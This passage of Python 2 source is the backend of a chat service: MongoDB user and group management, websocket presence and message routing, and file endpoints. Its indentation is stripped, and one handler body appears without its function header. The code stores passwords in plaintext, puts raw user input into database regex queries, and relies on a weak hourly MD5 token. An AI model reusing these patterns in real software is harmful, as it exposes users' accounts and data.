if querydict.has_key('filter'):
filter_str = querydict['filter']
del querydict['filter']
contactlist = user_query(session, {'username':{'$regex': '^.*' + filter_str + '.*$'}, 'limit':limit, 'skip':skip})
ret = []
keys = gWebSocketsMap.keys()
for i in contactlist:
for k in i.keys():
if not k in ['_id', 'username', 'display_name', 'avatar']:
del i[k]
if str(i['_id']) in keys:
i['online_status'] = 'online'
else:
i['online_status'] = 'offline'
ret.append(i)
ret = json.dumps(db_util.remove_mongo_id(ret), ensure_ascii=True, indent=4)
return ret
def user_contact_get(session, querydict):
ret = []
collection = get_collection(gConfig['chat_platform']['mongodb']['collection_users'])
q = {}
if querydict.has_key('username'):
if isinstance(querydict['username'], str) or isinstance(querydict['username'], unicode):
q['username'] = querydict['username']
del querydict['username']
if querydict.has_key('_id'):
if isinstance(querydict['_id'], str) or isinstance(querydict['_id'], unicode):
q['_id'] = db_util.add_mongo_id(querydict['_id'])
del querydict['_id']
if len(q.keys())>0:
contacts = []
selfid = None
rec = collection.find_one(q)
if rec and rec.has_key('contacts'):
# contacts = rec['contacts']
contacts = [db_util.add_mongo_id(i) for i in rec['contacts']]
ret = contacts
selfid = rec['_id']
limit = 0
skip = 0
user_detail = False
if querydict.has_key('user_detail') and querydict['user_detail'] is True:
user_detail = True
del querydict['user_detail']
if querydict.has_key('limit'):
try:
limit = int(querydict['limit'])
except:
pass
del querydict['limit']
if querydict.has_key('skip'):
try:
skip = int(querydict['skip'])
except:
pass
del querydict['skip']
if user_detail:
if querydict.has_key('filter'):
contactlist = user_query(session, {'username':{'$regex': '^.*' + querydict['filter'] + '.*$'}, '_id': {'$in':contacts, '$ne':selfid}, 'limit':limit, 'skip':skip})
del querydict['filter']
else:
contactlist = user_query(session, {'_id':contacts, 'limit':limit, 'skip':skip})
ret = []
keys = gWebSocketsMap.keys()
for i in contactlist:
if i.has_key('contacts'):
del i['contacts']
if i.has_key('password'):
del i['password']
if str(i['_id']) in keys:
i['online_status'] = 'online'
else:
i['online_status'] = 'offline'
ret.append(i)
ret = json.dumps(db_util.remove_mongo_id(ret), ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'user_contact_query_one_user_required'}, ensure_ascii=True, indent=4)
return ret
def user_get(session, querydict):
ret = ''
rec = user_query(session, querydict)
for i in rec:
idx = rec.index(i)
if i.has_key('contacts'):
del i['contacts']
if i.has_key('password'):
del i['password']
rec[idx] = i
if len(rec)>0:
ret = json.dumps(db_util.remove_mongo_id(rec), ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'query_no_record'}, ensure_ascii=True, indent=4)
return ret
def user_add(session, querydict):
ret = ''
if querydict.has_key('username') and querydict.has_key('password') and len(querydict['username'])>0 and len(querydict['password'])>0:
try:
collection = get_collection(gConfig['chat_platform']['mongodb']['collection_users'])
existone = collection.find_one({'username':querydict['username']})
if existone:
ret = json.dumps({'result':u'user_add_fail_username_already_exist'}, ensure_ascii=True, indent=4)
else:
obj = {}
obj['username'] = querydict['username']
obj['display_name'] = querydict['username']
obj['password'] = querydict['password']
ts = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
obj['register_date'] = ts
obj['update_date'] = ts
obj['description'] = ''
obj['person_info'] = {}
obj['contacts'] = []
obj['avatar'] = None
if querydict.has_key('person_info') :
obj['person_info'] = querydict['person_info']
if querydict.has_key('contacts') and isinstance(querydict['contacts'], list):
obj['contacts'] = querydict['contacts']
if querydict.has_key('avatar') and len(querydict['avatar']) > 0:
obj['avatar'] = querydict['avatar']
_id = collection.save(db_util.add_mongo_id(obj))
rec = collection.find_one({'_id':_id})
ret = json.dumps(db_util.remove_mongo_id(rec), ensure_ascii=True, indent=4)
except:
if hasattr(sys.exc_info()[1], 'message'):
ret = json.dumps({'result':u'user_add_fail:%s' % sys.exc_info()[1].message}, ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'user_add_fail' }, ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'user_add_fail_username_password_required'}, ensure_ascii=True, indent=4)
return ret
def user_update(session, querydict):
ret = ''
if querydict.has_key('_id') and len(querydict['_id'])>0:
try:
_id = db_util.add_mongo_id(querydict['_id'])
collection = get_collection(gConfig['chat_platform']['mongodb']['collection_users'])
existone = collection.find_one({'_id':_id})
if existone:
del querydict['_id']
querydict['update_date'] = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
collection.update({'_id':existone['_id']}, {'$set': db_util.add_mongo_id(querydict)}, multi=False, upsert=False)
one = collection.find_one({'_id':_id})
ret = json.dumps(db_util.remove_mongo_id(one), ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'user_update_user_not_exist'}, ensure_ascii=True, indent=4)
except:
if hasattr(sys.exc_info()[1], 'message'):
ret = json.dumps({'result':u'user_update_fail:%s' % sys.exc_info()[1].message}, ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'user_update_fail' }, ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'user_update_fail_user_id_required'}, ensure_ascii=True, indent=4)
return ret
def user_delete(session, querydict):
ret = ''
if querydict.has_key('_id') and len(querydict['_id'])>0:
try:
collection = get_collection(gConfig['chat_platform']['mongodb']['collection_users'])
existone = collection.find_one({'_id':db_util.add_mongo_id(querydict['_id'])})
if existone:
collection.remove({'_id':existone['_id']})
ret = json.dumps(db_util.remove_mongo_id(existone), ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'user_remove_user_not_exist'}, ensure_ascii=True, indent=4)
except:
if hasattr(sys.exc_info()[1], 'message'):
ret = json.dumps({'result':u'user_remove_fail:%s' % sys.exc_info()[1].message}, ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'user_remove_fail' }, ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'user_remove_fail_user_id_required'}, ensure_ascii=True, indent=4)
return ret
def group_add(session, querydict):
ret = ''
if querydict.has_key('owner_id')\
and len(querydict['owner_id']) > 0\
and querydict.has_key('group_name')\
and len(querydict['group_name']) > 0:
try:
collection = get_collection(gConfig['chat_platform']['mongodb']['collection_groups'])
existone = collection.find_one({'group_name':querydict['group_name']})
if existone:
ret = json.dumps({'result':u'group_add_fail_group_name_already_exist'}, ensure_ascii=True, indent=4)
else:
obj = {}
obj['owner_id'] = querydict['owner_id']
obj['group_name'] = querydict['group_name']
ts = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
obj['found_date'] = ts
obj['update_date'] = ts
obj['members'] = [db_util.add_mongo_id(obj['owner_id']), ]
if querydict.has_key('avatar') and len(querydict['avatar']) > 0:
obj['avatar'] = querydict['avatar']
if querydict.has_key('description') and len(querydict['description']) > 0:
obj['description'] = querydict['description']
_id = collection.save(db_util.add_mongo_id(obj))
rec = collection.find_one({'_id':_id})
ret = json.dumps(db_util.remove_mongo_id(rec), ensure_ascii=True, indent=4)
except:
if hasattr(sys.exc_info()[1], 'message'):
ret = json.dumps({'result':u'group_add_fail:%s' % sys.exc_info()[1].message}, ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'group_add_fail' }, ensure_ascii=True, indent=4)
else:
if not querydict.has_key('owner_id') or len(querydict['owner_id']) == 0:
ret = json.dumps({'result':u'group_add_fail_owner_id_required'}, ensure_ascii=True, indent=4)
if not querydict.has_key('group_name') or len(querydict['group_name']) == 0:
ret = json.dumps({'result':u'group_add_fail_group_name_required'}, ensure_ascii=True, indent=4)
return ret
def group_update(session, querydict):
ret = ''
if querydict.has_key('_id') and len(querydict['_id'])>0:
try:
_id = db_util.add_mongo_id(querydict['_id'])
collection = get_collection(gConfig['chat_platform']['mongodb']['collection_groups'])
existone = collection.find_one({'_id':_id})
if existone:
del querydict['_id']
querydict['update_date'] = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
collection.update({'_id':existone['_id']}, {'$set': db_util.add_mongo_id(querydict)}, multi=False, upsert=False)
one = collection.find_one({'_id':_id})
ret = json.dumps(db_util.remove_mongo_id(one), ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'group_update_group_not_exist'}, ensure_ascii=True, indent=4)
except:
if hasattr(sys.exc_info()[1], 'message'):
ret = json.dumps({'result':u'group_update_fail:%s' % sys.exc_info()[1].message}, ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'group_update_fail' }, ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'group_update_fail_group_id_required'}, ensure_ascii=True, indent=4)
return ret
def group_remove(session, querydict):
ret = ''
if querydict.has_key('_id') and len(querydict['_id']) > 0:
try:
collection = get_collection(gConfig['chat_platform']['mongodb']['collection_groups'])
existone = collection.find_one({'_id':db_util.add_mongo_id(querydict['_id'])})
if existone:
collection.remove({'_id':existone['_id']})
ret = json.dumps(db_util.remove_mongo_id(existone), ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'group_remove_fail_group_not_exist'}, ensure_ascii=True, indent=4)
except:
if hasattr(sys.exc_info()[1], 'message'):
ret = json.dumps({'result':u'group_remove_fail:%s' % sys.exc_info()[1].message}, ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'group_remove_fail' }, ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'group_remove_fail_found_group_id_required'}, ensure_ascii=True, indent=4)
return ret
def check_contact_exist(_id, alist):
ret = None
for i in alist:
if i['_id'] == _id:
ret = i
break
return ret
def online(user_id, websocket):
if user_id and websocket and not websocket.closed:
if not gWebSocketsMap.has_key(user_id):
gWebSocketsMap[user_id] = []
if not websocket in gWebSocketsMap[user_id]:
gWebSocketsMap[user_id].append(websocket)
def offline(user_id):
if user_id and gWebSocketsMap.has_key(user_id):
for i in gWebSocketsMap[user_id]:
i.close()
del gWebSocketsMap[user_id]
chat_save_log({
'op':'chat/offline',
'from':user_id,
'timestamp':time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
})
def get_destination(session, from_id, _id):
ret = []
if isinstance(_id, str) or isinstance(_id, unicode):
userlist = user_query(session, {'_id':from_id})
if len(userlist)==0:
userlist = user_query(session, {'username':from_id})
if len(userlist)>0:
user0 = userlist[0]
if user0.has_key('contacts'):
toid = _id
try:
toid = ObjectId(_id)
except:
ul = user_query(session, {'username':_id})
if len(ul)>0:
toid = ul[0]['_id']
if db_util.add_mongo_id(str(toid)) in user0['contacts']:
ret.append(str(toid))
elif isinstance(_id, list):
userlist = user_query(session, {'_id':from_id})
if len(userlist)==0:
userlist = user_query(session, {'username':from_id})
if len(userlist)>0:
user0 = userlist[0]
if user0.has_key('contacts'):
for id in _id:
if db_util.add_mongo_id(id) in user0['contacts']:
ret.append(id)
return ret
def get_destination_group(session, from_id, _id):
ret = []
userset = set()
grps = group_query(session, {'_id':_id})
for grp in grps:
if grp.has_key('members') and len(grp['members'])>0:
if db_util.add_mongo_id(from_id) in grp['members']:
userset = userset.union(set(grp['members']))
userlist = list(userset)
for id in userlist:
ret.append(id)
return ret
def resend_offline_msg(session, to_id, limit=10):
offlinecol = 'chat_log_offline'
if gConfig['chat_platform']['mongodb'].has_key('collection_chat_log_offline'):
offlinecol = gConfig['chat_platform']['mongodb']['collection_chat_log_offline']
collection = get_collection(offlinecol)
arr = list(collection.find({'to':db_util.add_mongo_id(to_id)}).limit(limit).sort('timestamp', pymongo.DESCENDING))
ids = [i['_id'] for i in arr]
collection.remove({'_id':{'$in': ids}})
for i in arr:
gJoinableQueue.put(db_util.remove_mongo_id(i))
def chat(session, websocket, obj={}):
tolist = []
if obj.has_key('from') and len(obj['from'])>0 and obj.has_key('msg') and len(obj['msg'])>0:
if obj.has_key('to') and len(obj['to'])>0:
tolist = get_destination(session, obj['from'], obj['to'])
if obj.has_key('to_group') and len(obj['to_group']) > 0:
tolist = get_destination_group(session, obj['from'], obj['to_group'])
for k in tolist:
try:
d = {'op': 'chat/chat', 'from': obj['from'], 'to': k, 'timestamp': time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()), 'msg': obj['msg']}
gJoinableQueue.put(d)
except gevent.queue.Full:
print('chat queue is full')
def request_response(session, websocket, obj={}):
#'chat/request/contact/add',
#'chat/request/contact/remove',
#'chat/response/contact/add/accept',
#'chat/response/contact/add/reject'
#'chat/request/group/join'
#'chat/request/group/quit'
#'chat/response/group/join/accept',
#'chat/response/group/join/reject',
tolist = []
try:
if obj['op'] == 'chat/response/contact/add/accept':
if obj.has_key('from') and len(obj['from'])>0 and obj.has_key('to') and len(obj['to'])>0:
collection = get_collection(gConfig['chat_platform']['mongodb']['collection_users'])
userlist = user_query(session, {'_id':[obj['from'], obj['to']]})
for user in userlist:
if str(user['_id']) == obj['from'] and not db_util.add_mongo_id(obj['to']) in user['contacts']:
user['contacts'].append(db_util.add_mongo_id(obj['to']))
if str(user['_id']) == obj['to'] and not db_util.add_mongo_id(obj['from']) in user['contacts']:
user['contacts'].append(db_util.add_mongo_id(obj['from']))
user['update_date'] = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
collection.save(user)
fromuser = {}
fromuser['op'] = obj['op']
fromuser['_id'] = obj['from']
fromuser['from'] = obj['to']
fromuser['to'] = obj['from']
fromuser['contacts'] = json.loads(user_contact_get(session, {'_id':obj['from'],'user_detail':True}))
gJoinableQueue.put(db_util.remove_mongo_id(fromuser))
touser = {}
touser['op'] = obj['op']
touser['_id'] = obj['to']
touser['from'] = obj['from']
touser['to'] = obj['to']
touser['contacts'] = json.loads(user_contact_get(session, {'_id':obj['to'],'user_detail':True}))
gJoinableQueue.put(db_util.remove_mongo_id(touser))
elif obj['op'] == 'chat/response/contact/add/reject':
if obj.has_key('from') and len(obj['from'])>0 and obj.has_key('to') and len(obj['to'])>0:
userlist = user_query(session, {'_id':obj['from']})
if len(userlist)>0:
user0 = userlist[0]
user0['op'] = obj['op']
user0['from'] = obj['from']
user0['to'] = obj['to']
if user0.has_key('password'):
del user0['password']
if user0.has_key('contacts'):
del user0['contacts']
if obj.has_key('reject_reason') and len(obj['reject_reason'])>0:
user0['reject_reason'] = obj['reject_reason']
gJoinableQueue.put(db_util.remove_mongo_id(user0))
elif obj['op'] == 'chat/request/contact/add':
if obj.has_key('from') and len(obj['from'])>0 and obj.has_key('to') and len(obj['to'])>0:
userlist = user_query(session, {'_id':obj['from']})
if len(userlist)>0:
user0 = userlist[0]
user0['op'] = obj['op']
user0['from'] = obj['from']
user0['to'] = obj['to']
if user0.has_key('password'):
del user0['password']
if user0.has_key('contacts'):
del user0['contacts']
gJoinableQueue.put(db_util.remove_mongo_id(user0))
elif obj['op'] == 'chat/request/contact/remove':
if obj.has_key('from') and len(obj['from'])>0 and obj.has_key('to') and len(obj['to'])>0:
collection = get_collection(gConfig['chat_platform']['mongodb']['collection_users'])
userlist = user_query(session, {'_id':[obj['from'], obj['to']]})
remover, removee = None, None
for user in userlist:
if str(user['_id']) == obj['from'] and db_util.add_mongo_id(obj['to']) in user['contacts']:
user['contacts'].remove(db_util.add_mongo_id(obj['to']))
remover = user['display_name']
if str(user['_id']) == obj['to'] and db_util.add_mongo_id(obj['from']) in user['contacts']:
user['contacts'].remove(db_util.add_mongo_id(obj['from']))
removee = user['display_name']
user['update_date'] = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
collection.save(user)
fromuser = {}
fromuser['op'] = obj['op']
fromuser['_id'] = obj['from']
fromuser['from'] = obj['to']
fromuser['to'] = obj['from']
fromuser['remover'] = remover
fromuser['removee'] = removee
fromuser['remove_type'] = 'remover'
fromuser['contacts'] = json.loads(user_contact_get(session, {'_id':obj['from'], 'user_detail':True}))
gJoinableQueue.put(db_util.remove_mongo_id(fromuser))
touser = {}
touser['op'] = obj['op']
touser['_id'] = obj['to']
touser['from'] = obj['from']
touser['to'] = obj['to']
touser['remover'] = remover
touser['removee'] = removee
touser['remove_type'] = 'removee'
touser['contacts'] = json.loads(user_contact_get(session, {'_id':obj['to'], 'user_detail':True}))
gJoinableQueue.put(db_util.remove_mongo_id(touser))
elif obj['op'] == 'chat/request/group/join':
if obj.has_key('from') and len(obj['from'])>0 and obj.has_key('to_group') and len(obj['to_group'])>0:
grps = group_query(session, {'_id':obj['to_group']})
if len(grps)>0:
grp0 = grps[0]
userlist = user_query(session, {'_id':obj['from']})
if len(userlist)>0:
user0 = userlist[0]
user0['op'] = obj['op']
user0['from'] = obj['from']
user0['request_src'] = obj['from']
user0['to_group'] = obj['to_group']
user0['to'] = grp0['owner_id']
if user0.has_key('password'):
del user0['password']
if user0.has_key('contacts'):
del user0['contacts']
gJoinableQueue.put(db_util.remove_mongo_id(user0))
elif obj['op'] == 'chat/request/group/quit':
if obj.has_key('from') and len(obj['from'])>0 and obj.has_key('to_group') and len(obj['to_group'])>0:
grps = group_query(session, {'_id':obj['to_group']})
if len(grps)>0:
grp0 = grps[0]
members = []
if db_util.add_mongo_id(obj['from']) in grp0['members']:
grp0['members'].remove(db_util.add_mongo_id(obj['from']))
members = [str(i) for i in grp0['members']]
collection = get_collection(gConfig['chat_platform']['mongodb']['collection_groups'])
collection.save(grp0)
broadcast(session, websocket, members, {'op':obj['op'], 'from':obj['from'], 'to_group':obj['to_group']} )
elif obj['op'] == 'chat/response/group/join/accept':
if obj.has_key('to_group') and len(obj['to_group'])>0 and obj.has_key('request_src') and len(obj['request_src'])>0:
grps = group_query(session, {'_id': obj['to_group']})
if len(grps)>0:
grp0 = grps[0]
if not db_util.add_mongo_id(obj['request_src']) in grp0['members']:
grp0['members'].append(db_util.add_mongo_id(obj['request_src']))
collection = get_collection(gConfig['chat_platform']['mongodb']['collection_groups'])
collection.save(grp0)
members = [str(i) for i in grp0['members']]
broadcast(session, websocket, members, obj)
elif obj['op'] == 'chat/response/group/join/reject':
if obj.has_key('from') and len(obj['from'])>0 and obj.has_key('to') and len(obj['to'])>0 and obj.has_key('to_group') and len(obj['to_group'])>0:
userlist = user_query(session, {'_id':obj['from']})
if len(userlist)>0:
user0 = userlist[0]
user0['op'] = obj['op']
user0['from'] = obj['from']
user0['to'] = obj['to']
user0['to_group'] = obj['to_group']
if user0.has_key('password'):
del user0['password']
if user0.has_key('contacts'):
del user0['contacts']
if obj.has_key('reject_reason') and len(obj['reject_reason'])>0:
user0['reject_reason'] = obj['reject_reason']
gJoinableQueue.put(db_util.remove_mongo_id(user0))
#else:
#d = {'op': obj['op'], 'from':obj['from'], 'to':k, 'timestamp':time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()),}
#gJoinableQueue.put(d)
except gevent.queue.Full:
print('chat queue is full')
def broadcast(session, websocket, alist, obj={}):
for i in alist:
d = {}
#d['timestamp'] = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
for k in obj.keys():
d[k] = obj[k]
if isinstance(i, str) or isinstance(i, unicode):
d['to'] = i
elif isinstance(i, dict):
if i.has_key('_id'):
d['to'] = i['_id']
try:
gJoinableQueue.put(d)
except:
pass
def handle_websocket(environ):
ws = get_websocket(environ)
app = gConfig['wsgi']['application']
#session_id = None
#channel = ''
#if environ.has_key('HTTP_COOKIE'):
#arr = environ['HTTP_COOKIE'].split('=')
#if len(arr)>1:
#session_id = arr[1]
interval = 1.0
try:
interval = float(gConfig[app]['websocket']['interval_poll'])
except:
interval = 1.0
while ws and not ws.closed:
obj = ws_recv(environ)
if obj and isinstance(obj, dict) and obj.has_key('op'):
if obj['op'] == 'queue_size':
qsize = 0
if gJoinableQueue:
qsize = gJoinableQueue.qsize()
ws.send(json.dumps({'queue_size':qsize}, ensure_ascii=True, indent=4))
elif obj['op'] == 'chat/online':
rec = []
if obj.has_key('_id') and len(obj['_id'])>0:
rec = user_query(session, {'_id':obj['_id']})
elif obj.has_key('username') and len(obj['username'])>0:
rec = user_query(session, {'username':obj['username']})
if len(rec)>0:
r0 = rec[0]
_id = str(r0['_id'])
online(_id, ws)
r0['contacts'] = json.loads(user_contact_get(session, {'_id':_id,'user_detail':True}))
r0['groups'] = json.loads(user_group_get(session, {'_id':_id,'user_detail':True}))
d = db_util.remove_mongo_id(r0)
d['op'] = obj['op']
d['from'] = _id
d['to'] = _id
d['timestamp'] = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
gJoinableQueue.put(d)
#ws.send(json.dumps(d, ensure_ascii=True, indent=4))
if obj.has_key('inform_contact') and obj['inform_contact'] is True:
other_contacts = gWebSocketsMap.keys()[:]
if _id in other_contacts:
other_contacts.remove(_id)
broadcast(session, ws, other_contacts, {'op':'chat/info/online','from':_id})
limit = 10
if gConfig['chat_platform'].has_key('resend') and gConfig['chat_platform']['resend'].has_key('max_resend_record_num'):
try:
limit = int(gConfig['chat_platform']['resend']['max_resend_record_num'])
except:
pass
resend_offline_msg(session, _id, limit)
else:
ws.send(json.dumps({'result':'chat_online_user_not_exist'}, ensure_ascii=True, indent=4))
elif obj['op'] == 'chat/offline':
if obj.has_key('_id'):
_id = obj['_id']
if obj.has_key('inform_contact') and obj['inform_contact'] is True:
other_contacts = gWebSocketsMap.keys()[:]
if _id in other_contacts:
other_contacts.remove(_id)
broadcast(session, ws, other_contacts, {'op':'chat/info/offline','from':_id, 'timestamp': time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())})
offline(_id)
elif obj.has_key('username'):
rec = user_query(session, {'username':obj['username']})
if len(rec)>0:
_id = str(rec[0]['_id'])
if obj.has_key('inform_contact') and obj['inform_contact'] is True:
other_contacts = gWebSocketsMap.keys()[:]
if _id in other_contacts:
other_contacts.remove(_id)
broadcast(session, ws, other_contacts, {'op':'chat/info/offline','from':_id})
offline(_id)
else:
ws.send(json.dumps({'result':'chat_offline_user_not_exist'}, ensure_ascii=True, indent=4))
else:
ws.send(json.dumps({'result':'chat_offline_username_or_id_required'}, ensure_ascii=True, indent=4))
elif obj['op'] == 'chat/chat':
chat(session, ws, obj)
elif 'chat/request' in obj['op'] or 'chat/response' in obj['op']:
request_response(session, ws, obj)
else:
try:
ws.send('')
except:
_id = None
for k in gWebSocketsMap.keys():
if ws in gWebSocketsMap[k] :
_id = k
break
if _id:
print('websocket[%s] is closed2' % _id)
offline(_id)
broadcast(session, None, gWebSocketsMap.keys(), {'op':'chat/info/offline', 'from':_id})
gevent.sleep(interval)
if ws and ws.closed:
del ws
def check_url_token(querydict):
is_token_pass = False
enable_url_md5_check = False
md5prefix = ''
if gConfig['chat_platform'].has_key('security') \
and gConfig['chat_platform']['security'].has_key('md5prefix'):
md5prefix = str(gConfig['chat_platform']['security']['md5prefix'])
if gConfig['chat_platform'].has_key('security') \
and gConfig['chat_platform']['security'].has_key('enable_url_md5_check') \
and gConfig['chat_platform']['security']['enable_url_md5_check'].lower() == 'true':
enable_url_md5_check = True
else:
is_token_pass = True
if enable_url_md5_check:
print('checking token...')
if querydict.has_key('_token'):
plain = '%s_|_%s' % (md5prefix, time.strftime('%Y%m%d%H'))
token = md5.new(plain).hexdigest()
if token == str(querydict['_token']):
is_token_pass = True
return is_token_pass
def chat_broadcast(session, querydict):
ret = '{}'
tolist = []
if querydict.has_key('from') and len(querydict['from'])>0:
if querydict.has_key('to'):
if isinstance(querydict['to'], str) or isinstance(querydict['to'], unicode):
tolist.append(querydict['to'])
if isinstance(querydict['to'], list):
tolist.extend(querydict['to'])
else:
ret = json.dumps({'result':u'chat_broadcast_to_required'}, ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'chat_broadcast_from_required'}, ensure_ascii=True, indent=4)
if querydict.has_key('msg') and len(querydict['msg'])>0:
for k in tolist:
try:
d = {'op': 'chat/chat', 'from': querydict['from'], 'to': k, 'timestamp': time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()), 'msg': querydict['msg']}
gJoinableQueue.put(d)
except gevent.queue.Full:
print('chat queue is full')
ret = json.dumps({'result':u'chat queue is full'}, ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'chat_broadcast_msg_required'}, ensure_ascii=True, indent=4)
return ret
def chat_log_query(session, querydict):
limit = 0
skip = 0
filter_str = ''
from_id, to_id = None, None
if querydict.has_key('from') and (isinstance(querydict['from'], str) or isinstance(querydict['from'], unicode)) and len(querydict['from'])>0:
from_id = querydict['from']
if querydict.has_key('to') and (isinstance(querydict['to'], str) or isinstance(querydict['to'], unicode)) and len(querydict['to'])>0:
to_id = querydict['to']
if from_id is None or to_id is None:
return json.dumps({'result':u'chat_log_query_from_and_to_required'}, ensure_ascii=True, indent=4)
if querydict.has_key('limit'):
try:
limit = int(querydict['limit'])
except:
pass
del querydict['limit']
if querydict.has_key('skip'):
try:
skip = int(querydict['skip'])
except:
pass
del querydict['skip']
if querydict.has_key('filter'):
filter_str = querydict['filter']
del querydict['filter']
# offlinecol = 'chat_log_offline'
# if gConfig['chat_platform']['mongodb'].has_key('collection_chat_log_offline'):
# offlinecol = gConfig['chat_platform']['mongodb']['collection_chat_log_offline']
collection1 = get_collection(gConfig['chat_platform']['mongodb']['collection_chat_log'])
# collection2 = get_collection(offlinecol)
ret = list(collection1.find({'$or':[{'from':db_util.add_mongo_id(from_id), 'to':db_util.add_mongo_id(to_id)}, {'to':db_util.add_mongo_id(from_id), 'from':db_util.add_mongo_id(to_id)}]}).limit(limit).skip(skip).sort('timestamp', pymongo.DESCENDING))
# arr2 = list(collection2.find({'$or':[{'from':db_util.add_mongo_id(from_id), 'to':db_util.add_mongo_id(to_id)}, {'to':db_util.add_mongo_id(from_id), 'from':db_util.add_mongo_id(to_id)}]}).limit(limit).skip(skip).sort('timestamp', pymongo.DESCENDING))
ret = json.dumps(db_util.remove_mongo_id(ret), ensure_ascii=True, indent=4)
return ret
def chat_log_remove(session, querydict):
return ''
headers = {}
headers['Content-Type'] = 'text/json;charset=' + ENCODING
statuscode = '200 OK'
body = ''
isnew = False
urls = gUrlMap.bind_to_environ(environ)
querydict, buf = get_querydict_by_GET_POST(environ)
endpoint = ''
try:
endpoint, args = urls.match()
if endpoint not in ['handle_websocket', 'gridfs_upload', 'gridfs_get', 'gridfs_delete', 'gridfs_query']:
if not check_url_token(querydict):
body = json.dumps({'result':u'invalid_token'}, ensure_ascii=True, indent=4)
return statuscode, headers, body
if querydict.has_key('_token'):
del querydict['_token']
if endpoint == 'user_add':
body = user_add(session, querydict)
elif endpoint == 'user_remove':
body = user_delete(session, querydict)
elif endpoint == 'user_get':
body = user_get(session, querydict)
elif endpoint == 'all_user_get':
body = all_user_get(session, querydict)
elif endpoint == 'user_update':
body = user_update(session, querydict)
elif endpoint == 'group_add':
body = group_add(session, querydict)
elif endpoint == 'group_get':
body = group_get(session, querydict)
elif endpoint == 'user_group_get':
body = user_group_get(session, querydict)
elif endpoint == 'user_contact_get':
body = user_contact_get(session, querydict)
elif endpoint == 'group_update':
body = group_update(session, querydict)
elif endpoint == 'group_remove':
body = group_remove(session, querydict)
elif endpoint == 'handle_websocket':
handle_websocket(environ)
elif endpoint == 'chat_broadcast':
body = chat_broadcast(session, querydict)
elif endpoint == 'chat_log_query':
body = chat_log_query(session, querydict)
elif endpoint == 'chat_log_remove':
body = chat_log_remove(session, querydict)
elif endpoint == 'gridfs_upload':
body = gridfs_upload(environ, querydict, buf)
elif endpoint == 'gridfs_get':
if args.has_key('_id'):
querydict['_id'] = args['_id']
if args.has_key('width'):
try:
querydict['width'] = int(args['width'])
except:
querydict['width'] = 64
if args.has_key('height'):
try:
querydict['height'] = int(args['height'])
except:
querydict['height'] = 64
statuscode, headers, body = gridfs_get(environ, querydict)
elif endpoint == 'gridfs_delete':
if args.has_key('_id'):
querydict['_id'] = args['_id']
statuscode, headers, body = gridfs_delete(environ, querydict)
elif endpoint == 'gridfs_query':
if querydict.has_key('_id'):
if isinstance(querydict['_id'], str) or isinstance(querydict['_id'], unicode):
if ',' in querydict['_id']:
querydict['_id'] = querydict['_id'].split(',')
else:
querydict['_id'] = [querydict['_id'],]
if args.has_key('width'):
try:
querydict['width'] = int(args['width'])
except:
querydict['width'] = 64
if args.has_key('height'):
try:
querydict['height'] = int(args['height'])
except:
querydict['height'] = 64
if args.has_key('limit'):
try:
querydict['limit'] = int(args['limit'])
except:
querydict['limit'] = 10
if args.has_key('skip'):
try:
querydict['skip'] = int(args['skip'])
except:
querydict['skip'] = 0
statuscode, headers, body = gridfs_query(environ, querydict)
else:
body = json.dumps({'result':u'access_deny'}, ensure_ascii=True, indent=4)
except HTTPException, e:
body = json.dumps({'result':u'access_deny'}, ensure_ascii=True, indent=4)
if session:
gSessionStore.save(session)
return statuscode, headers, body
def gridfs_get(environ, querydict):
global gConfig, ENCODING, STATICRESOURCE_DIR
def thumbnail(fp, size, use_base64=False):
ret = None
if 'image/' in fp.mimetype:
im = Image.open(fp)
im.thumbnail(size)
buf = StringIO.StringIO()
#print(im.format)
im.save(buf, im.format)
ret = buf.getvalue()
if use_base64:
ret = base64.b64encode(ret)
if 'application/' in fp.mimetype or 'text/' in fp.mimetype:
thumpath = gConfig['web']['thumbnail']['application/octet-stream']
if gConfig['web']['thumbnail'].has_key(fp.mimetype):
thumpath = gConfig['web']['thumbnail'][fp.mimetype]
thumpath = os.path.join(STATICRESOURCE_DIR, 'img', 'thumbnail', thumpath)
im = Image.open(thumpath)
im.thumbnail(size)
buf = StringIO.StringIO()
im.save(buf, im.format)
ret = buf.getvalue()
if use_base64:
ret = base64.b64encode(ret)
return ret
headers = {}
headers['Content-Type'] = 'text/json;charset=' + ENCODING
body = ''
statuscode = '200 OK'
if querydict.has_key('_'):
del querydict['_']
if querydict.has_key('_random'):
del querydict['_random']
if not querydict.has_key('_id'):
body = json.dumps({'result': u'gridfs_get_id_required'}, ensure_ascii=True, indent=4)
return statuscode, headers, body
app = gConfig['wsgi']['application']
if gConfig.has_key(app):
collection = 'fs'
if gConfig[app].has_key('mongodb') and gConfig[app]['mongodb'].has_key('gridfs_collection'):
collection = str(gConfig[app]['mongodb']['gridfs_collection'])
if len(collection) == 0:
collection = 'fs'
